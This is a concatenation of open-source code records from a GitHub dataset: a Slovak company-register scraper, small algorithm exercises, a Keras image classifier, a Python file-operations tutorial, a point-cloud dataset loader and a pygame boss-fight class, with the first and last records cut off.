return None\n\n def hladaj_podla_nazvu(self, nazov):\n url = 'http://orsr.sk/hladaj_subjekt.asp?PF=0&SID=0&R=on&OBMENO=' + nazov\n html = self.__load_html(url)\n\n root = etree.fromstring(html, etree.HTMLParser())\n elements = root.xpath('//div[@class=\"bmk\"][1]/a/@href')\n if len(elements) > 1:\n detail_url = 'http://orsr.sk/' + elements[0]\n detail_html = self.__load_html(detail_url)\n return OrSrDetailParser().parse(detail_html)\n else:\n return None\n\n\nclass OrSrDetailParser(object):\n def __init__(self):\n self.__detail = {\n 'nazov': '',\n 'sidlo': '',\n 'ico': '',\n 'den_zapisu': '',\n 'pravna_forma': '',\n 'predmet_cinnosti': [],\n 'spolocnici': [],\n 'statutarny_organ': [],\n 'dozorna_rada': ''\n }\n\n def parse(self, html):\n parser = etree.HTMLParser()\n root = etree.fromstring(html, parser)\n tables = root.xpath('/html/body/table')\n\n tmp_name = ''\n for table in tables:\n typ = self.__zisti_typ_zaznamu(table).lower().replace(':', '')\n\n if typ == 'obchodné meno' or typ == 'obchodné meno organizačnej zložky':\n self.__nacitaj_nazov_spolocnosti(table)\n elif typ == 'sídlo' or typ == 'sídlo organizačnej zložky' or typ == \"miesto podnikania\":\n self.__nacitaj_sidlo_spolocnosti(table)\n elif typ == 'ičo':\n self.__nacitaj_ico(table)\n elif typ == 'deň zápisu':\n self.__nacitaj_den_zapisu(table)\n elif typ == 'právna forma':\n self.__nacitaj_pravnu_formu(table)\n elif typ == 'predmet činnosti':\n self.__nacitaj_predmet_cinnosti(table)\n elif typ == 'spoločníci':\n self.__nacitaj_spolocnikov(table)\n elif typ == 'výška vkladu každého spoločníka':\n self.__nacitaj_vklady(table)\n elif typ == 'štatutárny orgán':\n self.__nacitaj_statutarny_organ(table)\n elif typ == 'dozorná rada':\n self.__nacitaj_dozornu_radu(table)\n elif typ == 'údaje o podnikateľovi' or typ == 'bydlisko':\n tmp_name += self.__process_udaje_o_podnikatelovi(table, typ)\n\n if tmp_name != '':\n self.__detail['spolocnici'].append(tmp_name.strip())\n self.__detail['statutarny_organ'].append(tmp_name.strip())\n\n return self.__detail\n\n def __zisti_typ_zaznamu(self, table):\n record_type = table.xpath('tr/td[1]/span/text()')\n record_type = ' '.join(record_type)\n record_type = record_type.strip().replace(':', '')\n return record_type\n\n def __nacitaj_nazov_spolocnosti(self, table): # nazov\n elements = table.xpath('tr/td[2]/table/tr/td[1]/span[1]/text()')\n self.__detail['nazov'] = ''.join(elements).strip()\n\n def __nacitaj_sidlo_spolocnosti(self, table): # sidlo\n spans = table.xpath('tr/td[2]//span')\n\n address = ''\n if len(spans) >= 4:\n address = spans[0].text.strip() + ' ' + spans[1].text.strip() + ', '\n address += spans[2].text.strip() + ', '\n address += spans[3].text.strip()\n\n pos = address.find(', (od:')\n if pos != -1:\n address = address[0:pos]\n else:\n # TODO\n #address = tds[0].get_text()\n pass\n\n self.__detail['sidlo'] = address.strip()\n\n def __nacitaj_ico(self, table): # ico\n ico = ''.join(table.xpath('tr/td[2]/table/tr/td[1]/span[1]/text()')).strip()\n self.__detail['ico'] = ico\n\n def __nacitaj_den_zapisu(self, table): # den zapisu\n den_zapisu = ''.join(table.xpath('tr/td[2]/table/tr/td[1]/span[1]/text()')).strip()\n self.__detail['den_zapisu'] = den_zapisu\n\n def __nacitaj_pravnu_formu(self, table): # pravna forma\n pravna_forma = ''.join(table.xpath('tr/td[2]/table/tr/td[1]/span[1]/text()')).strip()\n self.__detail['pravna_forma'] = pravna_forma\n\n def __nacitaj_predmet_cinnosti(self, table): # predmet cinnosti\n elements = (table.xpath('tr/td[2]/table/tr/td[1]/span[1]'))\n self.__detail['predmet_cinnosti'] = [e.text.strip() for e in elements]\n\n def __nacitaj_spolocnikov(self, table): # spolocnici\n spolocnici = []\n\n tds = table.xpath('tr/td[2]/table/tr/td[1]')\n for td in tds:\n elements = td.xpath('child::span | child::br | child::a/span')\n\n br = 0\n meno = ''\n adresa_l = []\n for e in elements:\n if e.tag == 'br':\n br += 1\n\n if 'span' and br == 0:\n meno += e.text.strip() + ' '\n elif e.tag == 'span' and br > 0:\n adresa_l.append(e.text.strip())\n\n adresa = ''\n if br == 3:\n if len(adresa_l) == 3:\n adresa = adresa_l[0] + ' ' + adresa_l[1] + ', ' + adresa_l[2]\n elif len(adresa_l) == 4:\n adresa = adresa_l[0] + ' ' + adresa_l[1] + ', ' + ', '.join(adresa_l[2:])\n\n spolocnici.append(meno + '( ' + adresa + ' )')\n elif br > 3:\n adresa = adresa_l[0] + ' ' + adresa_l[1] + ', ' + ', '.join(adresa_l[2:])\n spolocnici.append(meno + '( ' + adresa + ' )')\n\n self.__detail['spolocnici'] = spolocnici\n\n def __nacitaj_vklady(self, table): # vklady\n vklady = []\n self.__detail['vklady'] = vklady\n\n def __nacitaj_statutarny_organ(self, table): # statutarny organ\n statutarny_organ = []\n\n elements = table.xpath('tr/td[2]/table/tr/td[1]//span | tr/td[2]/table/tr/td[1]//br')\n\n statutarny_organ.append(elements.pop(0).text.strip())\n\n br_counter = 0\n meno_tmp = []\n adresa_tmp = []\n for e in elements:\n if e.tag == 'br':\n br_counter += 1\n else:\n text = e.text.strip()\n\n if 'Vznik funkcie' in text:\n adresa = ' '.join(adresa_tmp[:2]) + ', '\n adresa += ', '.join(adresa_tmp[2:])\n item = ' '.join(meno_tmp) + ' ( ' + adresa + ' )'\n statutarny_organ.append(item)\n\n br_counter = 0\n meno_tmp = []\n adresa_tmp = []\n elif br_counter == 1:\n meno_tmp.append(e.text.strip())\n elif 'pobyt na území SR' not in text:\n adresa_tmp.append(e.text.strip())\n\n self.__detail['statutarny_organ'] = statutarny_organ\n\n def __nacitaj_dozornu_radu(self, table):\n dozorna_rada = []\n\n elements = table.xpath('tr/td[2]/table/tr/td[1]//span | tr/td[2]/table/tr/td[1]//br')\n br = 0\n meno = ''\n adresa_l = []\n process_record = False\n for e in elements:\n if e.tag == 'br':\n br += 1\n\n if e.tag == 'span' and 'Vznik funkcie' in e.text:\n process_record = True\n elif process_record and br == 1:\n br = 0\n process_record = False\n elif e.tag == 'span' and br == 0:\n meno += e.text.strip() + ' '\n elif e.tag == 'span' and br > 0:\n text = e.text.strip()\n if 'pobyt na území SR' not in text and 'Vznik funkcie' not in text:\n adresa_l.append(text)\n\n adresa = ''\n if process_record:\n if len(adresa_l) == 3:\n adresa = adresa_l[0] + ' ' + adresa_l[1] + ', ' + adresa_l[2]\n elif len(adresa_l) == 4:\n adresa = adresa_l[0] + ' ' + adresa_l[1] + ', ' + ', '.join(adresa_l[2:])\n else:\n adresa = ', '.join(adresa_l)\n\n dozorna_rada.append(meno + '( ' + adresa + ' )')\n\n br = 0\n meno = ''\n adresa_l = []\n\n self.__detail['dozorna_rada'] = dozorna_rada\n\n def __process_udaje_o_podnikatelovi(self, table, which):\n l = []\n elements = table.xpath('tr/td[2]/table/tr/td[1]/span/text()')\n for e in elements:\n if 'od:' not in e:\n l.append(e.strip())\n\n if which == 'bydlisko':\n txt = '( ' + ' '.join(l) + ' )'\n else:\n txt = ' '.join(l) + ' '\n\n return txt\n","repo_name":"richard-mihalovic/py-orsr","sub_path":"orsr.py","file_name":"orsr.py","file_ext":"py","file_size_in_byte":9478,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"50"} +{"seq_id":"23309636739","text":"def page_digits(pages):\n #Sort it for those that can't go len-2\n if pages < 10: \n x = (range(1, pages + 1))\n list_for_length = []\n for i in x: \n i = str(i)\n list_for_length.append(len(i))\n return sum(list_for_length)\n # and everyone else!\n else: \n y = ''\n length = len(str(pages))\n l = '9' * (length - 1)\n y = str(length - 2) + ('8' * (length-2)) + '9'\n y = int(y)\n y = y + (((pages - int(l)) * length))\n return y \n\n\n ","repo_name":"gordonbowe18/code_wars","sub_path":"count_page_numbers/answer/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"79372437","text":"def countInv(arr):\n # exit condition for recursion\n if len(arr)<=1:\n return 0\n mid = len(arr)//2\n leftarr=arr[:mid]\n rightarr=arr[mid:]\n lefinv = countInv(leftarr)\n rightinv = countInv(rightarr)\n i=0\n j=0\n k=0\n invcount=0\n while i fully connected layer; activation function take a linear model (1 degree) and make it polynomial (more than 1 degree)\r\n keras.layers.Dense(10, activation=\"softmax\") #output layer\r\n])\r\n\r\nmodel.compile(optimizer=\"adam\", loss=\"sparse_categorical_crossentropy\", metrics=[\"accuracy\"]) #loss functions minimize the functions in order to not make it too difficult to work with\r\n\r\nmodel.fit(train_images, train_labels, epochs=5) #here we train the model\r\n\r\nprediction = model.predict(test_images)\r\nfor i in range(45,50):\r\n plt.grid(False)\r\n plt.imshow(test_images[i], cmap=plt.cm.binary)\r\n plt.xlabel(\"Actual:\"+ class_names[test_labels[i]])\r\n plt.title(\"Prediction:\"+ class_names[np.argmax(prediction[i])]) #show the neuron which the highest value in terms of being certain that is true\r\n plt.show()\r\n","repo_name":"hasanarcas/Python-AI","sub_path":"Neural Networks/Clothes classification/Clothes Classification.py","file_name":"Clothes Classification.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31760441245","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport shutil\nimport time\n\nprint(os.name)\nprint(os.uname())\nprint(os.environ)\n\nprint(os.environ.get('PATH'))\nprint(os.environ.get('x', 'default'))\nprint(os.environ.get('PYTHONPATH'))\n\nprint('\\n---- Path ----')\nprint(os.path.abspath('.'))\nprint(os.path.join('~', 'test-dir'))\npath = os.path.join(os.path.abspath('.'), 'test-dir')\nos.mkdir(path)\nos.rmdir(path)\n\nprint(path)\nprint(os.path.split(path))\n\npath = os.path.join(os.path.abspath('.'), 'python.png')\nprint(path)\nprint(os.path.splitext(path))\n\n\nprint('\\n---- File ----')\nfile_name = 'test.txt'\nif not os.path.exists(os.path.join(os.path.abspath('.'), file_name)):\n with open(file_name, 'x') as file:\n pass\n\nfile_rename = 'test.py'\nos.rename(file_name, file_rename)\nos.remove(file_rename)\n\n\nprint('\\n---- Copy File ----')\npath = os.path.abspath('.')\nparent_path = os.path.abspath('..')\nfile_name = 'README.md'\nif os.path.exists(os.path.join(parent_path, file_name)):\n shutil.copyfile(os.path.join(parent_path, file_name), os.path.join(path, file_name))\n input('Can you see a duplicated %s?\\nAny key to remove it.' % file_name)\n os.remove(os.path.join(path, file_name))\n\n\nprint('\\n---- Use copyfile() for directory ----')\ndirectory_name = 'UnitTest'\nif os.path.exists(os.path.join(parent_path, directory_name)):\n try:\n shutil.copyfile(os.path.join(parent_path, directory_name), os.path.join(path, directory_name))\n input('Can you see a duplicated directory named %s?\\nAny key to remove' % directory_name)\n os.remove(os.path.join(path, directory_name))\n except IsADirectoryError as an_error:\n print(an_error)\n print('copyfile() can not respond to directory')\n\n\nprint('\\n---- Use copy() for directory')\nsrc = os.path.join(parent_path, directory_name)\ndst = os.path.join(path, directory_name)\nif os.path.exists(src):\n try:\n shutil.copy(src, dst)\n input('Can you see a duplicated directory named %s?\\nAny key to remove' % directory_name)\n os.remove(dst)\n except IsADirectoryError as an_error:\n print(an_error)\n print('copy() can not respond to directory')\n\n\nprint('\\n---- Use copytree() for directory')\nsrc = os.path.join(parent_path, directory_name)\ndst = os.path.join(path, directory_name)\nif os.path.exists(dst):\n shutil.rmtree(dst)\nif os.path.exists(src):\n try:\n shutil.copytree(src, dst)\n input('Can you see a duplicated directory named %s?\\nAny key to remove' % directory_name)\n os.removedirs(dst)\n except IsADirectoryError as an_error:\n print(an_error)\n print('copytree() can not respond to directory')\n except OSError as an_error:\n print(an_error)\n print('os.remove() or os.removedirs() are not the key func, let us try the shutil.rmtree()')\n shutil.rmtree(dst)\n\n\nprint('\\n---- List ----')\ndirectory_name = os.path.expanduser('~')\nprint(os.listdir(directory_name))\nprint('---- After filtration ----')\ndirs = [x for x in os.listdir(directory_name) if os.path.isdir(os.path.join(directory_name, x))]\nprint(dirs)\ndirs = [x for x in os.listdir(directory_name) if '.' in os.path.join(directory_name, x)]\nprint(dirs)\n","repo_name":"stonewin540/python.python3-hello-world","sub_path":"IO/file-operations.py","file_name":"file-operations.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34319505462","text":"import os\nimport torch\nimport numpy as np\nimport open3d as o3d\nimport torch.utils.data as data\nfrom scipy.spatial.transform import Rotation as R\nimport open3d as o3d\n\n\ndef jitter_point_cloud(batch_data, sigma=0.01, clip=0.0225):\n \"\"\" Randomly jitter points. jittering is per point.\n Input:\n BxNx3 array, original batch of point clouds\n Return:\n BxNx3 array, jittered batch of point clouds\n \"\"\"\n B, N, C = batch_data.shape\n assert(clip > 0)\n jittered_data = np.clip(sigma * np.random.randn(B, N, C), -1*clip, clip)\n jittered_data += batch_data\n return jittered_data\n\ndef farthest_point_sampling(points, num_samples):\n num_points = points.shape[0]\n sampled_indices = np.zeros(num_samples, dtype=np.int32)\n distances = np.full(num_points, np.inf)\n\n # 随机选择一个起始点\n start_index = 0\n sampled_indices[0] = start_index\n\n for i in range(1, num_samples):\n last_sampled_index = sampled_indices[i - 1]\n last_sampled_point = points[last_sampled_index]\n\n # 计算每个点到最后一个采样点的距离\n dist_to_last_sampled = np.linalg.norm(points - last_sampled_point, axis=1)\n\n # 更新距离数组,保留最小距离\n distances = np.minimum(distances, dist_to_last_sampled)\n\n # 选择最远的点作为下一个采样点\n next_sampled_index = np.argmax(distances)\n sampled_indices[i] = next_sampled_index\n\n return points[sampled_indices]\n\ndef pc_normalize(pc):\n centroid = np.mean(pc, axis=0)\n pc = pc - centroid\n m = np.max(np.sqrt(np.sum(pc**2, axis=1)))\n pc = pc / m\n return pc\n\nclass ToolsDataset(data.Dataset):\n def __init__(self, args):\n super(ToolsDataset, self).__init__()\n\n self.input_num = args.input_num\n self.args = args\n # input and gt: (b, n, 3) radius: (b, 1)\n self.datas = []\n self.names = []\n print('Loading and processing point cloud, waiting ...')\n tmp_datas = []\n tmp_names = []\n print('args.file_path',args.file_path)\n load_data_path = os.path.join(args.file_path,'pc_{}pts.npz'.format(self.input_num))\n print('load_data_path',load_data_path)\n if os.path.exists(load_data_path): # 加载已有数据\n tdatas = np.load(load_data_path,allow_pickle=True)['data']\n tnames = np.load(load_data_path,allow_pickle=True)['name']\n for iii in range(len(tdatas)):\n tmp_datas.append(tdatas[iii])\n tmp_names.append(str(tnames[iii]))\n\n for root, dirs, files in os.walk(args.file_path):\n for file in files:\n if file.endswith('pcd'):\n tmp_name = os.path.join(root,file)\n\n if tmp_name in tmp_names:\n self.datas.append(tmp_datas[tmp_names.index(tmp_name)])\n self.names.append(tmp_name)\n continue\n\n pcd=o3d.io.read_point_cloud(tmp_name)#路径需要根据实际情况设置\n input=np.asarray(pcd.points)#A已经变成n*3的矩阵\n\n lens = len(input)\n\n if lens < self.input_num :\n ratio = int(self.input_num /lens + 1)\n tmp_input = np.tile(input, (ratio, 1))\n input = tmp_input[:self.input_num]\n\n if lens > self.input_num:\n # np.random.shuffle(input) # 每次取不一样的1024个点\n input = farthest_point_sampling(input, self.input_num)\n\n self.datas.append(input)\n self.names.append(tmp_name)\n\n np.savez(load_data_path,data=self.datas,name=self.names)\n print('data lens: ',len(self.datas))\n\n # 计算相似度\n load_data_sim_path = os.path.join(args.file_path,'pc_{}pts_sim.npz'.format(self.input_num))\n tmpex_name,tmpex_sim = [],[]\n if os.path.exists(load_data_sim_path): # 加载已有数据\n tmpex_sim = np.load(load_data_sim_path,allow_pickle=True)['sim']\n tmpex_name = np.load(load_data_sim_path,allow_pickle=True)['name']\n is_calc_sim = False\n if len(tmpex_name) != len(self.names):\n is_calc_sim = True\n else:\n for ii in range(len(self.names)):\n if self.names[ii]!=str(tmpex_name[ii]):\n is_calc_sim = True\n break\n self.sim = tmpex_sim\n if is_calc_sim:\n l = len(self.datas)\n self.sim = np.zeros((l,l))\n print('please wait, calculating point cloud similarity ... ')\n for i in range(l): # 两个for循环可能有点慢\n for j in range(i+1,l):\n point_cloud1 = o3d.geometry.PointCloud()\n point_cloud1.points = o3d.utility.Vector3dVector(pc_normalize(self.datas[i])) # 示例点云1\n point_cloud2 = o3d.geometry.PointCloud()\n point_cloud2.points = o3d.utility.Vector3dVector(pc_normalize(self.datas[j]))\n mean_distance_t_s = np.mean(point_cloud1.compute_point_cloud_distance(point_cloud2)) # 倒角距离,值越小越相似\n self.sim[i,j] = mean_distance_t_s\n self.sim[j,i] = mean_distance_t_s\n np.savez(load_data_sim_path,sim=self.sim,name=self.names)\n print('finished calculatpoint cloud similarity ')\n\n def __len__(self):\n return len(self.datas)\n\n def __getitem__(self, index):\n # (n, 3)\n input = self.datas[index]\n # pcd=o3d.io.read_point_cloud(input)#路径需要根据实际情况设置\n # input=np.asarray(pcd.points)#A已经变成n*3的矩阵\n if np.random.rand() >= 0.5: # 1是正样本对\n label = 1\n else:\n label = 0\n\n input1 = input\n if label == 1: # 正样本对\n msg = '哈哈正样本'\n input2 = jitter_point_cloud(input[None,...]).squeeze()\n else: # 负样本对\n if np.random.rand() >= 0.5: # 生成旋转的负样本对\n # 生成一个随机旋转矩阵\n random_rotation = R.random()\n # 获取旋转矩阵的矩阵表示\n rotation_matrix = random_rotation.as_matrix()\n # 将点云中的每个点应用旋转\n input2 = np.dot(rotation_matrix, input.T).T\n msg = '旋转负样本'\n else: # 和其他样本生成负样本对\n sim = self.sim[index]\n min_idx = np.argsort(sim)\n neg_id = np.random.choice(min_idx[-100:])\n input2 = self.datas[neg_id]\n msg = '其他负样本'\n\n input1 = pc_normalize(input1)\n input1 = torch.from_numpy(input1)\n input2 = pc_normalize(input2)\n input2 = torch.from_numpy(input2)\n\n return input1,input2,label,msg","repo_name":"LJJ1799/matching_client","sub_path":"pointnet2/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":7009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40156705965","text":"import pygame\nimport random\nfrom .settings import *\nfrom .collisions import *\nfrom .spritesheets import *\n\nboss_hand_spritesheet = spritesheet(\"assets/boss/arm_projectile_glowing.png\")\nhand_attack_animations = \\\n\tboss_hand_spritesheet.load_strip((0, 0, 100, 100), 3, (0, 0, 0)) + boss_hand_spritesheet.load_strip((0, 100, 100, 100), 3, (0, 0, 0))\n\nhand_attack_animations = [scale_image(img, 0.5) for img in hand_attack_animations]\n\nclass BaseAttackHand:\n\tdef __init__(self, gaurdian_rect, facing_right):\n\t\tself.rect = gaurdian_rect.copy()\n\t\tself.speed = 12 if facing_right else -12\n\t\tself.current_frame = 0\n\t\tself.image = hand_attack_animations[self.current_frame]\n\t\tself.state = 0\n\t\n\tdef update(self):\n\t\tself.current_frame += 0.2\n\t\tif int(self.current_frame) > len(hand_attack_animations) - 1:\n\t\t\tself.current_frame = 0\n\t\tself.image = hand_attack_animations[int(self.current_frame)]\n\n\t\tif self.state == 0:\n\t\t\tself.rect.x += self.speed\n\t\t\tif self.rect.centerx < 0 or self.rect.centerx > SCALE_WIDTH:\n\t\t\t\tself.state = 2 \n\t\t\t\tself.rect.x += self.speed * 30\n\t\t\t\tself.speed = -self.speed * 1.8\n\t\t\t\tself.rect.y = random.randint(SCALE_HEIGHT - 95, SCALE_HEIGHT - 40)\n\t\telse:\n\t\t\tself.rect.x += self.speed\n\t\t\tif self.speed > 0 and self.rect.centerx > SCALE_WIDTH + 50:\n\t\t\t\tself.state = \"done\"\n\t\t\telif self.speed < 0 and self.rect.centerx < -50:\n\t\t\t\tself.state = \"done\"\n\t\n\tdef render(self, screen):\n\t\timage = self.image\n\t\tif self.speed < 5:\n\t\t\timage = pygame.transform.flip(self.image, True, False)\n\t\tscreen.blit(image, (self.rect.centerx - self.image.get_width()/2, self.rect.centery - self.image.get_height()/2))\n\nboss_spritesheet = spritesheet(\"assets/boss/spritesheet.png\")\n\nIDLE = \"idle\"\nBASE_ATTACK = \"base_attack\"\nSUPER_SMASH = \"super_smash\"\nHELL_FIRE = \"hell_fire\"\nTARGET_SHURIKEN = 3\nBLAST_SHURIKEN = 4\nCOOLDOWN = \"cooldown\"\n\nanimations = {\n\t\"idle\": boss_spritesheet.load_strip((0, 0, 100, 100), 4, (0, 0, 0)),\n\t\"base_attack\": boss_spritesheet.load_strip((0, 200, 100, 100), 9, (0, 0, 0)),\n\t\"super_smash\": boss_spritesheet.load_strip((0, 300, 100, 100), 8, (0, 0, 0)),\n\t\"hell_fire\": boss_spritesheet.load_strip((0, 500, 100, 100), 6, (0, 0, 0)),\n\t\"cooldown\": boss_spritesheet.load_strip((0, 600, 100, 100), 10, (0, 0, 0))\n}\n\nATTACK_STAGES = {\n\t\"1\": [BASE_ATTACK, BASE_ATTACK, BASE_ATTACK, SUPER_SMASH],\n\t\"2\": [BASE_ATTACK, SUPER_SMASH, HELL_FIRE],\n\t\"3\": [SUPER_SMASH, HELL_FIRE, TARGET_SHURIKEN, BLAST_SHURIKEN],\n}\n\nanimations[\"idle\"] = [scale_image(img, 0.5) for img in animations[\"idle\"]]\nanimations[\"base_attack\"] = [scale_image(img, 0.5) for img in animations[\"base_attack\"]]\nanimations[\"super_smash\"] = [scale_image(img, 0.5) for img in animations[\"super_smash\"]]\nanimations[\"hell_fire\"] = [scale_image(img, 0.5) for img in animations[\"hell_fire\"]]\nanimations[\"cooldown\"] = [scale_image(img, 0.5) for img in animations[\"cooldown\"]]\n\nclass Boss:\n\tdef __init__(self, player, borders):\n\t\tself.player = player\n\t\tself.rect = pygame.Rect(SCALE_WIDTH/2 + 45, -50, 50, 50)\n\t\tself.borders = borders\n\t\tself.entered = False\n\t\tself.stage = 1\n\n\t\tself.state = IDLE\n\t\tself.action = animations[self.state]\n\t\tself.current_frame = 0\n\t\tself.image = self.action[self.current_frame]\n\t\tself.facing_right = False\n\t\tself.entered_time = 0\n\t\tself.message = None\n\t\tself.attacking = False\n\t\tself.done_attack = False\n\t\tself.attack_hand= None\n\t\tself.idle_move = False\n\t\tself.idle_new_x = 0\n\t\tself.last_walked = 0\n\t\tself.walk_wait_times = 200\n\t\tself.times_to_attack = 8\n\t\tself.smash_times = random.randint(8, 18)\n\t\tself.smashed_times = 0\n\t\tself.start_y = 50\n\t\tself.moving_to_cooldown = False\n\t\tself.cooling_down = False\n\t\tself.moving_back = False\n\t\tself.cooling_down_start = 0\n\t\tself.low_y = SCALE_HEIGHT - 100\n\t\tself.bombs = 0\n\t\t# [loc, velocity, timer]\n\t\tself.particles = []\n\n\t\tself.max_health = 1000\n\t\tself.health = self.max_health\n\t\tself.health_bar_length = SCALE_WIDTH / 2\n\t\tself.health_ratio = self.max_health / self.health_bar_length\n\t\n\tdef update(self):\n\t\tself.action = animations[self.state]\n\t\tif self.moving_to_cooldown or self.cooling_down or self.moving_back:\n\t\t\tif self.moving_to_cooldown:\n\t\t\t\tif self.rect.y < self.low_y:\n\t\t\t\t\tself.rect.y += 3\n\t\t\t\t\tif abs(self.rect.y - self.low_y) < 10:\n\t\t\t\t\t\tself.rect.y = self.low_y\n\t\t\t\t\t\tself.moving_to_cooldown = False\n\t\t\t\t\t\tself.cooling_down = True\n\t\t\t\t\t\tself.cooling_down_start = pygame.time.get_ticks()\n\t\t\telif self.cooling_down:\n\t\t\t\tif pygame.time.get_ticks() - self.cooling_down_start > 4000:\n\t\t\t\t\tself.cooling_down = False\n\t\t\t\t\tself.moving_to_cooldown = False\n\t\t\t\t\tself.moving_back = True\n\t\t\t\t\tself.state = IDLE\n\t\t\telif self.moving_back:\n\t\t\t\tif self.rect.y > self.start_y:\n\t\t\t\t\tself.rect.y -= 3\n\t\t\t\t\tif abs(self.rect.y - self.start_y) < 10:\n\t\t\t\t\t\tself.rect.y = self.start_y\n\t\t\t\t\t\tself.moving_to_cooldown = False\n\t\t\t\t\t\tself.moving_back = False\n\t\t\tself.current_frame += 0.2\n\t\t\tif int(self.current_frame) > len(self.action) - 1:\n\t\t\t\tself.current_frame = 0\n\t\telif self.attacking:\n\t\t\tif self.state == BASE_ATTACK:\n\t\t\t\tself.current_frame += 0.6\n\t\t\t\tif int(self.current_frame) > len(self.action) - 1:\n\t\t\t\t\tself.done_attack = True\n\t\t\t\t\tself.current_frame = len(self.action) - 1\n\t\t\t\telif int(self.current_frame) > len(self.action) - 2 and self.attack_hand is None:\n\t\t\t\t\tself.attack_hand = BaseAttackHand(self.rect, self.facing_right)\n\t\t\t\t\tself.attacking = False\n\t\t\t\t\tself.times_to_attack -= 1\n\t\t\telif self.state == SUPER_SMASH:\n\t\t\t\tif int(self.current_frame) < len(self.action) - 1 and not self.smashed_times >= self.smash_times:\n\t\t\t\t\tself.current_frame += 0.2\n\t\t\t\telif self.smashed_times >= self.smash_times:\n\t\t\t\t\tif self.rect.y < self.start_y:\n\t\t\t\t\t\tself.rect.y += 25 * 0.15\n\t\t\t\t\t\tif self.current_frame > 0:\n\t\t\t\t\t\t\tself.current_frame -= 0.2\n\t\t\t\t\t\t\n\t\t\t\t\t\tif abs(self.rect.y - self.start_y) < 5:\n\t\t\t\t\t\t\tself.rect.y = self.start_y\n\t\t\t\t\t\t\tself.state = IDLE\n\t\t\t\t\t\t\tself.times_to_attack -= 1\n\t\t\t\t\t\t\tself.attacking = False\n\t\t\t\telse:\n\t\t\t\t\tself.rect.y += 28\n\t\t\t\t\tif self.rect.y > SCALE_HEIGHT + 100:\n\t\t\t\t\t\tself.rect.y = - 100\n\t\t\t\t\t\tself.rect.centerx = self.player.rect.centerx\n\t\t\t\t\t\tself.smashed_times += 1\n\t\t\t\t\t\tif self.smashed_times >= self.smash_times:\n\t\t\t\t\t\t\tself.rect.centerx = SCALE_WIDTH / 2\n\t\t\telif self.state == HELL_FIRE:\n\t\t\t\tif int(self.current_frame) < len(self.action) - 1:\n\t\t\t\t\tself.current_frame += 0.2\n\t\t\t\t\n\t\t\t\tif len(self.particles) < 150 and self.bombs <= 250 and random.randint(0, 50) > 20:\n\t\t\t\t\tself.bombs += 1\n\t\t\t\t\tself.particles.append(\n\t\t\t\t\t\t[\n\t\t\t\t\t\t\t[\n\t\t\t\t\t\t\t\tself.rect.centerx,\n\t\t\t\t\t\t\t\tself.rect.centery + 20\n\t\t\t\t\t\t\t],\n\t\t\t\t\t\t\t[random.randint(0, 20) / 10 - 1, -5],\n\t\t\t\t\t\t\trandom.randint(6, 10),\n\t\t\t\t\t\t\trandom.randint(-15, 15),\n\t\t\t\t\t\t]\n\t\t\t\t\t)\n\t\t\t\t\n\t\t\t\tif self.bombs >= 250 and len(self.particles) == 0:\n\t\t\t\t\tself.state = IDLE\n\t\t\t\t\tself.times_to_attack -= 1\n\t\t\t\t\tself.attacking = False\n\n\t\t\t\tfor particle in self.particles:\n\t\t\t\t\tparticle[0][1] += 5\n\t\t\t\t\tparticle[0][0] += particle[3]\n\t\t\t\t\tparticle[2] -= 0.02\n\n\t\t\t\t\tif particle[0][1] > SCALE_HEIGHT + 30:\n\t\t\t\t\t\tself.particles.remove(particle)\n\t\t\t\t\n\t\t\t\tif not self.idle_move:\n\t\t\t\t\tif pygame.time.get_ticks() - self.last_walked > 100:\n\t\t\t\t\t\tif random.randint(0, 100) > 80:\n\t\t\t\t\t\t\tself.idle_move = True\n\t\t\t\t\t\t\tself.idle_new_x = random.randint(50, SCALE_WIDTH - 100)\n\t\t\t\t\t\t\twhile abs(self.rect.x - self.idle_new_x) < 50:\n\t\t\t\t\t\t\t\tself.idle_new_x = random.randint(100, SCALE_WIDTH - 100)\n\t\t\t\t\t\t\tif self.idle_new_x > self.rect.x:\n\t\t\t\t\t\t\t\tself.facing_right = True\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.facing_right = False\n\t\t\t\telse:\n\t\t\t\t\tself.rect.x += (self.idle_new_x - self.rect.x) * 0.04\n\t\t\t\t\tif abs(self.rect.x - self.idle_new_x) < 30:\n\t\t\t\t\t\tself.idle_new_x = 0\n\t\t\t\t\t\tself.idle_move = False\n\t\t\t\t\t\tself.last_walked = pygame.time.get_ticks()\n\t\t\t\t\t\tself.walk_wait_times = random.randint(200, 1200)\n\n\t\telse:\n\t\t\tself.current_frame += 0.09\n\t\t\tif int(self.current_frame) > len(self.action) - 1:\n\t\t\t\tself.current_frame = 0\n\t\t\t\tself.state = IDLE\n\t\tself.image = self.action[int(self.current_frame)]\n\n\t\tif self.attack_hand is not None and self.attack_hand.state == \"done\":\n\t\t\tself.attack_hand = None\n\n\t\tif self.state == IDLE and self.entered:\n\t\t\tif not self.idle_move:\n\t\t\t\tif pygame.time.get_ticks() - self.last_walked > self.walk_wait_times:\n\t\t\t\t\tif random.randint(0, 100) > 80:\n\t\t\t\t\t\tself.idle_move = True\n\t\t\t\t\t\tself.idle_new_x = random.randint(50, SCALE_WIDTH - 100)\n\t\t\t\t\t\twhile abs(self.rect.x - self.idle_new_x) < 50:\n\t\t\t\t\t\t\tself.idle_new_x = random.randint(100, SCALE_WIDTH - 100)\n\t\t\t\t\t\tif self.idle_new_x > self.rect.x:\n\t\t\t\t\t\t\tself.facing_right = True\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.facing_right = False\n\t\t\telse:\n\t\t\t\tself.rect.x += (self.idle_new_x - self.rect.x) * 0.04\n\t\t\t\tif abs(self.rect.x - self.idle_new_x) < 30:\n\t\t\t\t\tself.idle_new_x = 0\n\t\t\t\t\tself.idle_move = False\n\t\t\t\t\tself.last_walked = pygame.time.get_ticks()\n\t\t\t\t\tself.walk_wait_times = random.randint(200, 